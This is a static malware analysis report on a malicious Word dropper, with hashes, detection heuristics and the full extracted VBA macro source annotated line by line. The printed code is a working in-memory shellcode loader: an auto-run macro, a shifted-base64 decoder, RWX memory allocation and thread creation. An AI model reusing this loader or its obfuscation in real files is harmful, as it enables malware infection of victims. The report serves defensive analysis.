Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c610c28e8e0c7d97…

MALICIOUS

Office (OLE)

178.0 KB Created: 2016-11-22 15:18:00 Authoring application: Microsoft Office Word First seen: 2016-12-03
MD5: fbacd3a810f755d1cf6067a215e56ba6 SHA-1: 0333bc58d3410550b422e4982683a2e6d435f593 SHA-256: c610c28e8e0c7d97062e93863fdcf6e9c2dd29ce495ae82615f0123c864a444f
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic · T1566.001 Spearphishing Attachment · T1203 Exploitation for Client Execution

The file is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-1841838'. It contains VBA macros, including a Document_Open auto-execution macro and a GetObject call, indicating an attempt to execute code. The obfuscated VBA script likely downloads and executes a secondary payload, a common tactic for droppers; the extracted source also declares ZwAllocateVirtualMemory, RtlMoveMemory and SHCreateThread (ntdll/Shlwapi imports), which is equally consistent with decoding an embedded payload and running it in process memory, and no download API is declared in the extracted source. No specific family could be confidently identified.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-1841838 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1841838
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        Set wdApp = GetObject(, "Word.Application")
        Set wdDoc = wdApp.ActiveDocument
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    Dim nonce As String
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ — In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# — In document text (OLE body)
    These are XMP/RDF namespace identifiers from embedded image metadata, not network indicators; the extracted macro source references no URL at all.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13127 bytes
SHA-256: 5f9d7b4fee551dfb02dc5d5b808101942b4d7bba17b0c742d36e36a951fca2da
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' [analysis] Header of the document class module. The auto-execution entry
' point is Document_Open further down; it calls pendente, which drives the
' decode-and-execute chain.
' [analysis] Filler routine: a Word object-model snippet that fetches the
' primary header of section 1 and does nothing with it. It is never called
' from the visible code and carries no loader logic.
Sub headerFooter()
    Dim myHeader As headerFooter
    Set myHeader = ActiveDocument.Sections(1).Headers _
        (wdHeaderFooterPrimary)
End Sub


' [analysis] Stages the decoded payload in executable memory.
'   anesthetized - the decoded buffer produced by holmium (passed via pendente)
'   returns      - base address of the newly allocated region
' External names are aliases declared in module "installation":
'   canister = RtlMoveMemory, toft = ZwAllocateVirtualMemory.
' Only biol, deleterious and oversensitive carry meaning; the remaining
' locals, string assignments and the If/Else block are padding.
Function ratified(anesthetized)
Dim accretive As String
Dim fleck As Byte
Dim biol As Long
' Copies 4 bytes from offset 8 of the Variant argument into biol. Offset 8 is
' the Variant's data slot, so this appears to read the pointer to the buffer
' contents (low 32 bits only, biol being a Long) -- TODO confirm against the
' Byte-array-to-String conversion at the end of holmium.
canister biol, VarPtr(anesthetized) + 8, 4
Dim speed As Long
Dim neomys As Integer
Dim behindhand As Long
#If Win64 Then
Dim endoparasite As Long
Dim blueness As Byte
Dim deleterious As LongPtr
Dim extortion As Byte
Dim oversensitive As LongPtr
Dim auroroa As Integer
#Else
Dim domiciled As String
Dim deleterious As Long
Dim scaliness As Long
Dim oversensitive As Long
Dim kisses As Integer
Dim neopolitan As Variant
#End If
' ZwAllocateVirtualMemory(ProcessHandle = -1 (current process),
'   BaseAddress = &deleterious (0 -> let the kernel pick), ZeroBits = 0,
'   RegionSize = &oversensitive (9737 bytes), AllocationType = 4096
'   (MEM_COMMIT), Protect = 64 (PAGE_EXECUTE_READWRITE)).
clothesline = -1
deleterious = 109 - 4 - 105 ' = 0
defeatism = 0
oversensitive = 124 + 9613 ' = 9737 bytes requested
jokingly = 4096 ' MEM_COMMIT
nimblewitted = 64 ' PAGE_EXECUTE_READWRITE
geographically = toft(ByVal clothesline, deleterious, ByVal defeatism, oversensitive, ByVal jokingly, ByVal nimblewitted)
evil = "carangidae"

erection = "pithless"

' RtlMoveMemory(dest = allocated region, src = biol, 6183 bytes). 6183 matches
' the decoded length holmium produces (2061 four-character groups x 3 bytes).
canister ByVal deleterious, biol, 6183
gem = 55
imbreu = 83
' 55 / 83 is below 7, so the Then branch never runs: opaque-predicate padding.
If (gem / imbreu) >= 7 Then
gem = Trim("agr") & Trim("anulocytosis")
choirmaster = Abs(239.51)
despairingly = despairingly
consolidative = Replace("cquerulousness", "querulousness", "a") & Trim("refree")
Else
erection = "docked"
imbreu = 11
End If

' Return the executable region's base; pendente adds an entry offset to it.
ratified = deleterious
End Function
' [analysis] Loader driver, called from Document_Open. Visible flow:
'   1. read the .Tag of each enabled tab of the control erosive.insignificantly
'   2. keep the last 8244 characters and decode them with installation.holmium
'   3. pass the decoded bytes to ratified (allocate RWX memory, copy them in)
'   4. start a thread at base + fixed offset via bonnet (= SHCreateThread)
' The string constants, While loops and "If (a / b) >= k" blocks in between
' are padding; none of their results feed the four steps above.
Sub pendente()
Dim lithophyte As String
Dim rari As Variant
' Payload source: the Tag property of a control on module "erosive"
' (presumably a TabStrip/MultiPage on a UserForm). The encoded string is
' therefore stored in the form's storage, not in the extracted VBA source.
Set afterbirth = erosive.insignificantly.Tabs
For Each convolvulaceae In afterbirth
alienum = 59
courtierly = 51
If (alienum / courtierly) >= 11 Then
alienum = Replace("aburled", "burled", "c") & "comm" & LCase$("odAtiOn")
unthankfulness = Fix(135.678)
unthankfulness = unthankfulness / 482
imposition = Replace("benshrine", "enshrine", "r") & LCase$("it")
Else
unthankfulness = Round(155.1296)
courtierly = 114
End If

' Only the last enabled tab's Tag survives the loop.
If convolvulaceae.Enabled = True Then
fullcolored = "florist"
waive = LTrim("sc") & "raper"
osteology = "eggs"
magniloquence = convolvulaceae.Tag
End If
Next
' 8244 characters = 2061 four-character groups -> 6183 decoded bytes.
semivowel = 8244
seedless = Right(magniloquence, semivowel)
' holmium: shifted-alphabet base64 decoder in module "installation".
efficient = installation.holmium(seedless)
cambio = 86
earnestly = 73
If (cambio / earnestly) >= 6 Then
cambio = Replace("aencumbered", "encumbered", "r") & RTrim("seni") & LCase$("ouS")
fern = Round(351.387)
choirmaster = fern * 1
albeit = RTrim("pe") & RTrim("ptone")
Else
evil = bountifulness
earnestly = 69
End If

bedclothes = "ac" & "cept"
#If Win64 Then
Dim cramped As String
Dim anchored As hoyle
Dim presupposition As LongPtr
anchored.start = 0
Dim ophthalmology As Variant
#Else
Dim thigh As Byte
anchored = 0
Dim deposit As Integer
Dim presupposition As Long
#End If
miniaturization = 0
bankbook = "emerging"
pigeonbreasted = 86 + 57 + 3953
autofluorescence = 10
While autofluorescence <= 15
autofluorescence = autofluorescence + 2
despairingly = "defamer"
unthankfulness = unthankfulness + 481
Wend

malpractice = "proclaim"
nudge = RTrim("ut") & "terly"
hydromyinae = "dynamiter"
acuminate = "choppy"
axis = 4
While axis <= 8
axis = axis + 2
erection = "mottled"
choirmaster = Int(159.1337)
Wend

fiction = efficient
pyrrhonism = "douanier"
' ratified allocates an executable region, copies the decoded bytes into it
' and returns the region's base address.
presupposition = ratified(fiction)
transom = "anointed"
' Entry-point offset into the decoded payload: 1280 on 64-bit VBA, 3677 on
' 32-bit (506 + 3171).
#If VBA6 And Win64 Then
Dim selfdeprecating As Integer
clique = "ammobium"
ceremonie = "sunbonnet"
alarmist = "ded" & "icated"
shitless = 114 - 8 + 1174
#ElseIf Win32 Then
doubleacrostic = "suitor"
knurly = "abasia"
cleaver = "gat"
varied = 104 - 128 + 120 + 410
shitless = varied + 3171

#End If
Dim celsius As Long
Dim mummy As Variant
Dim hotelier As Long
hotelier = 0
Dim oriel As Long
' Thread start address = region base + entry offset.
oriel = presupposition + shitless
Dim fucking As Long
fucking = 95 - 94 ' = 1
' SHCreateThread(pfnThreadProc = oriel, pData = 0, flags = 1 (CTF_INSIST),
' pfnCallback = 0): a new thread in this process begins executing the
' decoded payload. The return value is discarded.
barefaced = bonnet(oriel, hotelier, fucking, hotelier)
monstrum = 12
While monstrum <= 16
monstrum = monstrum + 2
choirmaster = Int(290.1088)
fern = Int(451.288)
Wend

End Sub

' [analysis] Auto-execution entry point (OLE_VBA_DOCOPEN). Its only real
' action is the call to pendente; the For loop that follows assigns string
' constants and is padding. No GetObject call occurs here -- the GetObject
' hit (OLE_VBA_GETOBJ) is in the unused InsertText routine below.
Private Sub Document_Open()
Dim nonce As String
Dim driveway As Long
microcyte = "expressed"
pendente
For mantology = 23 To 72
adrenotrophin = 72
erection = bountifulness
sciolist = LCase$("aN") & Replace("almagog", "magog", "yze")
sciolist = "al" & LTrim("l")
Next mantology
End Sub


Attribute VB_Name = "installation"
' [analysis] API import table for the loader, split by bitness. The existing
' single-quote comments between the declarations are song lyrics used as
' filler. Of the aliases below, only three are referenced by the visible
' code: canister (RtlMoveMemory), toft (ZwAllocateVirtualMemory) and bonnet
' (SHCreateThread). The OpenClipboard, SetParent, EndPaint, GetUpdateRect and
' Sleep aliases are never called and look like decoys. Note the Win64 branch
' is gated on "VBA6 And Win64", whereas ratified/pendente test "Win64" alone.
'But think twice, that's my only advice
#If VBA6 And Win64 Then
'Does that make me crazy?
' hoyle is only used for the unused local "anchored" in pendente.
Public Type hoyle
'And I hope that you are having the time of your life
start As LongPtr
'Maybe you're crazy
End Type
'And it's no coincidence I've come
Public Declare PtrSafe Function romanist Lib "user32" Alias "OpenClipboard" (endless As LongPtr) As Boolean
'But it wasn't because I didn't know enough
' bonnet: SHCreateThread(pfnThreadProc, pData, flags, pfnCallback) -- used to run the payload.
Public  Declare PtrSafe Function bonnet Lib "Shlwapi" Alias "SHCreateThread" (ByVal landwehr As Any, ByVal elizabeth As Any, ByVal brownie As Any, ByVal variegated As Any) As LongPtr
'Ever since I was little, ever since I was little it looked like fun
Public Declare PtrSafe Function anastigmat Lib "user32" Alias "SetParent" (ByVal blackcock As LongPtr, ByVal lupanar As LongPtr,animastic As LongPtr) As LongPtr
'I think you're crazy
Public Declare PtrSafe Function ovation Lib "user32" Alias "EndPaint" (fronder As LongPtr,fieriness As LongPtr) As LongPtr
'But it wasn't because I didn't know enough
Public Declare PtrSafe Function archdeaconry Lib "user32" Alias "GetUpdateRect" (acaricide As LongPtr, alces As LongPtr,mineralized As LongPtr) As Boolean
'And I hope that you are having the time of your life
' toft: ZwAllocateVirtualMemory(ProcessHandle, BaseAddress, ZeroBits,
' RegionSize, AllocationType, Protect). "bottomlessByVal" is a single
' parameter name (missing space), so RegionSize is passed ByRef, which is
' what the in/out pointer parameter requires.
Public  Declare PtrSafe Function toft Lib "ntdll" Alias "ZwAllocateVirtualMemory" (highwayman As LongPtr, manes As LongPtr, ByVal diakinesis As LongPtr,bottomlessByVal As LongPtr, ornithorhynchus As LongPtr, ByVal pantyhose As LongPtr) As LongPtr
'Without care,
' canister: RtlMoveMemory(dest, src, length) -- used both to read a pointer
' out of a Variant and to copy the decoded payload into executable memory.
Public  Declare PtrSafe Sub canister Lib "ntdll.dll" Alias "RtlMoveMemory" (besiege As Any, ByVal sac As Any, ByVal misreading As LongPtr)
'And I can die when I'm done
Public Declare PtrSafe Function academia Lib "kernel32.dll" Alias "Sleep" (demosthenic As LongPtr)
'Maybe I'm crazy

'Probably
#Else
'Just like me
' 32-bit counterparts of the declarations above; same aliases for canister,
' toft and bonnet, different (unused) names for the decoy imports.
Public Declare Sub canister Lib "ntdll.dll" Alias "RtlMoveMemory" (south As Any, ByVal enchant As Any, ByVal lutjanus As Long)
'But it wasn't because I didn't know enough
Public Declare Function toft Lib "ntdll" Alias "ZwAllocateVirtualMemory" (temporality As Long, ashamed As Long, ByVal ac As Long, anthelminticByVal As Long, haliaeetus As Long, ByVal ladderback As Long) As Long
'Even your emotions had an echo
Public Declare Function buildup Lib "user32" Alias "EndPaint" (animos As Long, bibliopole As Long) As Long
'And all I remember is thinking, I want to be like them
Public Declare Function aspergillosis Lib "user32" Alias "SetParent" (ByVal comedown As Long, ByVal gymslip As Long, unsympathizing As Long) As Long
'Ever since I was little, ever since I was little it looked like fun
Public Declare Function sisyridae Lib "user32" Alias "OpenClipboard" (calliopsis As Long) As Boolean
'Maybe we're crazy
Public Declare Function approximative Lib "user32" Alias "GetUpdateRect" (manoftheearth As Long, ahab As Long, timekeeper As Long) As Boolean
'But it wasn't because I didn't know enough
Public Declare Function shopworn Lib "kernel32.dll" Alias "Sleep" (misfire As Long)
'Even your emotions had an echo
Public Declare Function bonnet Lib "Shlwapi" Alias "SHCreateThread" (ByVal causeway As Any, ByVal polarity As Any, ByVal lincomycin As Any, ByVal aphorism As Any) As Long
'Maybe I'm crazy

'Without care,
#End If
'There was something so pleasant about that place.
' [analysis] This is the routine behind the OLE_VBA_GETOBJ heuristic.
' GetObject(, "Word.Application") only attaches to the already-running Word
' instance and types a fixed sentence at the current selection; it matches a
' Word object-model documentation sample and is never called from the visible
' code. The actual loader is pendente/ratified, so the GetObject hit should
' be read as a decoy, not as the execution mechanism.
'There was something so pleasant about that place.
Sub InsertText()
    Dim wdApp As Word.Application
    Dim wdDoc As Document
    Dim wdSln As Selection
    
    Set wdApp = GetObject(, "Word.Application")
    Set wdDoc = wdApp.ActiveDocument
    Set wdSln = wdApp.Selection
    
    wdDoc.Application.Options.Overtype = False
    With wdSln
        If .Type = wdSelectionIP Then
            .TypeText ("Inserting at insertion point. ")
        ElseIf .Type = wdSelectionNormal Then
                If wdApp.Options.ReplaceSelection Then
                    .Collapse Direction:=wdCollapseStart
                End If
               .TypeText ("Inserting before a text block. ")
        End If
    End With
    Set wdApp = Nothing
    Set wdDoc = Nothing
End Sub

' [analysis] Decoder for the encoded payload string.
'   mainspring - the 8244-character string taken from the form control's Tag
'   returns    - the 6183 decoded bytes (a Byte array assigned to the String
'                return value; the caller passes it on as a raw buffer)
' As visible below: take the first 8244 characters, add 9 to every character
' code, then perform a standard base64 decode (alphabet A-Z a-z 0-9 + /) in
' groups of four characters -> three bytes. Helper wrappers: wheaten = AscW,
' novelization = multiply, enchanting = And, balanoposthitis = integer divide.
' Constants that are assigned but never read (hollandaise, budapest,
' methodize, diplopterygium, phytohormone, ...) and the If/While blocks with
' string literals are padding.
Function holmium(mainspring) As String
Dim branta As Long
choirmaster = Abs(477.943)

Dim adjuc(255) As Byte
Dim cuquenan() As Byte
Dim disseminate As Variant

Dim monstrance As Long
Dim journalism(63) As Long
Dim perennium As Long
fern = Abs(253.1377)

Dim apophasis As Integer

Dim flax As String
Dim fogyish As Variant

Dim collide As Integer
Dim aphrodite(63) As Long
Dim prospectively(6965) As Byte
Dim conventioneer(63) As Long
Dim forehand As Long
Dim praxis As Variant

snorer = 8 + 4088 ' = 4096 = 64^2
Dim preparer As Byte

enlarged = 16711680 ' = &HFF0000
stargazer = 61 + 41 + 79 + 65099 ' = 65280 = &HFF00
oracle = 7 + 65529 ' = 65536
Dim impelled As Long

hollandaise = 14 + 16515058
auc = 128 - 38 - 27
beaugregory = 5 + 107 + 144 ' = 256
numerate = 38 - 24 + 241 ' = 255 = &HFF
budapest = 49 - 26 + 258025
angelically = 21 + 43 ' = 64
methodize = 17 + 4015
baccivorous = 262144 ' = 64^3
Dim backflow As Integer
Dim adamantine(8243) As Byte
scombroidea = 14 + 113 - 127 ' = 0
gazelle = 8243
' adamantine(i) = AscW(character i+1 of mainspring) for i = 0..8243.
For caryota = scombroidea To gazelle
benzoin = 10 - 65 + 56 ' = 1 (one character per Mid$)
architecturally = Mid$(mainspring, caryota + 1, benzoin)
beaconfire = "jung"
birdseye = "au" & Trim("rar")
dragon = "antitypic"
callionymidae = wheaten(architecturally)
adamantine(caryota) = callionymidae
Next
Dim canvas As Integer
For elbowroom = 4 To 61
meagerness = 61
bountifulness = "facts"
arachis = RTrim("enth") & Trim("usiastic")
arachis = "ag" & Replace("disauden", "auden", "tis")
Next elbowroom

' Add 9 to every character code: the stored text is the base64 alphabet
' shifted by -9, presumably so the payload does not look like base64 at rest.
dumbfounded = 8243
nakedwood = 45 + 104 + 102 - 216
For guidebook = 0 To dumbfounded
adamantine(guidebook) = adamantine(guidebook) + 9
Next guidebook
chowchow = 12
While chowchow <= 16
chowchow = chowchow + 2
bountifulness = "acinar"
despairingly = bountifulness
Wend

' Build the base64 reverse table adjuc: A-Z -> 0..25, a-z -> 26..51,
' 0-9 -> 52..61, '+' (43) -> 62, '/' (47) -> 63.
collide = 0
argon = 122
stercorarius = 255
rimmed = 123 + 107 - 230 ' = 0
amorphophallus = 29 + 6 - 56 + 64 ' = 43 = '+'
For branta = rimmed To stercorarius
If (branta >= 65 And branta <= 90) Then adjuc(branta) = branta - 65
If (branta >= 97 And branta <= 122) Then adjuc(branta) = branta - 71
If (branta >= 48 And branta <= 57) Then adjuc(branta) = branta + 4
If branta = amorphophallus Then adjuc(branta) = 62
If branta = 47 Then adjuc(branta) = 63
Next branta
' Positional weights for the four sextets of a group: 64^3, 64^2, 64^1, 64^0.
For branta = 0 To 63
conventioneer(branta) = novelization(branta, angelically)
aphrodite(branta) = novelization(branta, snorer)
journalism(branta) = novelization(branta, baccivorous)
Next branta
dracontium = 75
prestidigitation = 59
If (dracontium / prestidigitation) >= 33 Then
dracontium = RTrim("do") & LTrim("ur")
bountifulness = "abettor"
despairingly = "besetting"
chevaux = LCase$("plAs") & "modiid" & LTrim("ae")
Else
erection = "relevancy"
prestidigitation = 66
End If

cuquenan = adamantine
diplopterygium = 108 + 117 - 221
outsole = 76
redundant = 95
If (outsole / redundant) >= 34 Then
outsole = LCase$("aLP") & LCase$("hAbEtArian")
choirmaster = Abs(293.854)
fern = Round(273.125)
mourner = RTrim("gr") & Replace("acilpubescent", "pubescent", "a") & Trim("riidae")
Else
unthankfulness = choirmaster * 1
redundant = 36
End If

quibbling = 10 + 97 - 111 + 7 ' = 3 (index of the 4th character in a group)
bountifulness = "femme"

erection = "dolabriform"

phytohormone = quibbling + 1
jetpropelled = 2
' Main decode loop. forehand advances by 3 inside the body plus 1 at Next,
' i.e. one 4-character group per iteration; perennium is the output index.
For forehand = 0 To dumbfounded
hexaglot = cuquenan(forehand)
schrodinger = cuquenan(forehand + 2)
' 24-bit value = s0*64^3 + s1*64^2 + s2*64 + s3.
monstrance = journalism(adjuc(hexaglot)) _
 + aphrodite(adjuc(cuquenan(forehand + 1))) + conventioneer(adjuc(schrodinger)) + adjuc(cuquenan(forehand + quibbling))
' Split into three bytes: (v And &HFF0000) \ 65536, (v And &HFF00) \ 256, v And &HFF.
branta = enchanting(monstrance, enlarged)
prospectively(perennium) = balanoposthitis(branta, oracle)
branta = enchanting(monstrance, stargazer)
prospectively(perennium + 1) = balanoposthitis(branta, beaugregory)
prospectively(perennium + jetpropelled) = enchanting(monstrance, numerate)
perennium = perennium + jetpropelled + 1
forehand = forehand + 3
Next
' Byte array -> String return value; 2061 groups yield 6183 bytes.
holmium = prospectively
End Function

' [analysis] Wrapper around AscW (character code of the first character);
' used by holmium to obscure the call.
Function wheaten(impact)
wheaten = AscW(impact)
End Function
' [analysis] Integer division wrapper; holmium uses it to shift a masked
' 24-bit value down to a byte (divisors 65536 and 256).
Function balanoposthitis(mummichog, fatigued)
balanoposthitis = mummichog \ fatigued
End Function
' [analysis] Multiplication wrapper; holmium uses it to build the 64^n
' weight tables for base64 decoding.
Function novelization(milliampere, bethel)
novelization = milliampere * bethel
End Function
' [analysis] Bitwise And wrapper; holmium uses it to mask one byte out of a
' 24-bit value (&HFF0000, &HFF00, &HFF).
Function enchanting(bacchantic, advisory)
enchanting = bacchantic And advisory
End Function


Attribute VB_Name = "erosive"
Attribute VB_Base = "0{C3924C9C-6CFE-4AE7-ABD7-28B16CD87459}{288479EA-5434-43B3-A778-3E82FBF33BAF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' [analysis] Module "erosive" has no code; the VB_Base GUID pair with
' PredeclaredId = True and Exposed = False is consistent with a UserForm
' designer module. pendente reads erosive.insignificantly.Tabs(...).Tag, so
' the encoded payload presumably lives in that control's Tag inside the
' form's storage streams -- which is why it is absent from this extracted
' VBA source and should be carved separately for analysis.